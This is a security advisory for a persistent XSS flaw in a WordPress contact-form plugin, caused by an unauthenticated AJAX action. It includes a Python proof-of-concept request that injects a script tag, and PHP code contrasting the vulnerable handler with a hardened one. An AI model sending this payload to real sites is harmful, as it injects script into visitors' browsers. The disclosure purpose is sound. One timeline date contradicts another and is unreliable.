Contact Form Integrated With Google Maps 1.0 - 2.4, Persistent XSS

Due to exposing an AJAX function to anonymous users by using the ‘nopriv’ method of adding an AJAX action, anonymous users are able to insert arbitrary HTML / Javascript onto the site globally.

Homepage

https://wordpress.org/plugins/contact-form-integrated-with-google-maps/

CVSS Score

6.4

CVSS Vector

(AV:N/AC:L/Au:N/C:P/I:P/A:N)

Attack Scope

remote

Authorization Required

None

Mitigation

Update to version 2.5

Proof of Concept

The following Python script will result in arbitrary JavaScript being executed on page load. Any custom HTML content can be inserted into the ‘value’ field, so long as an ‘iframe’ element exists in the provided data.

import requests

# admin-ajax.php dispatches the 'action' parameter to the plugin's handler,
# which is reachable without authentication because of the nopriv hook.
url = 'http://localhost/wp-admin/admin-ajax.php'
payload = {
    "action": "master_response",
    "value": "<iframe></iframe><script>alert('.');</script>",
}
r = requests.post(url, data=payload)
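For reference, the pattern behind this bug and the checks a fixed handler needs, as an added illustration written for this advisory (it is not the plugin's source and does not claim to reproduce the 2.5 fix). The action name ‘master_response’ and the ‘value’ field are taken from the proof of concept above; the option name ‘cfigm_custom_html’, the nonce action ‘cfigm_save_html’ and the function names are assumptions made for the example.

```php
<?php
/*
 * Added example, not the plugin's own code.
 * Option name, nonce action and function names are assumptions.
 */

/* ---- Vulnerable pattern (hypothetical reconstruction, shown for contrast only;
 *      a real plugin would never register both handlers) ---- */
// Hooking the callback under wp_ajax_nopriv_ exposes it to unauthenticated
// visitors via /wp-admin/admin-ajax.php?action=master_response, and the raw
// POST body is stored site-wide with no nonce, capability check or filtering.
function cfigm_vulnerable_master_response() {
    update_option( 'cfigm_custom_html', $_POST['value'] );
    wp_die();
}
// add_action( 'wp_ajax_master_response',        'cfigm_vulnerable_master_response' );
// add_action( 'wp_ajax_nopriv_master_response', 'cfigm_vulnerable_master_response' );

/* ---- Hardened handler ---- */
// 1. No wp_ajax_nopriv_ hook: anonymous requests never reach the callback.
// 2. check_ajax_referer() rejects requests without a valid nonce (CSRF).
// 3. current_user_can() limits the change to users who may manage options.
// 4. wp_kses_post() strips <script>, inline event handlers and other
//    disallowed markup before the value is stored.
function cfigm_hardened_master_response() {
    check_ajax_referer( 'cfigm_save_html', 'nonce' );

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'insufficient privileges' ), 403 );
    }

    $raw   = isset( $_POST['value'] ) ? wp_unslash( $_POST['value'] ) : '';
    $clean = wp_kses_post( $raw );

    update_option( 'cfigm_custom_html', $clean );
    wp_send_json_success( array( 'stored' => $clean ) );
}
add_action( 'wp_ajax_master_response', 'cfigm_hardened_master_response' );

// Escape again at the point of output, so a value that reached the option by
// any other path still cannot execute script in visitors' browsers.
function cfigm_render_custom_html() {
    echo wp_kses_post( get_option( 'cfigm_custom_html', '' ) );
}
```

The page that issues the AJAX request must send the token produced by wp_create_nonce( 'cfigm_save_html' ) in the ‘nonce’ field, or check_ajax_referer() terminates the request. wp_kses_post() also removes iframe elements; if the feature genuinely needs an embedded map, pass an explicit allow-list to wp_kses() that permits iframe with a small fixed set of attributes rather than accepting arbitrary markup.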

Timeline

  • 2014-09-22: Discovered
  • 2014-09-22: Reported to vendor
  • 2014-09-22: Vendor responded with intent to fix
  • 2014-09-29: Update requested from vendor
  • 2014-09-30: CVE requested
  • 2014-09-02: CVE assigned
  • 2014-10-06: Update requested from vendor
  • 2014-10-11: 2.5 released – issue resolved
  • 2014-10-18: Advisory released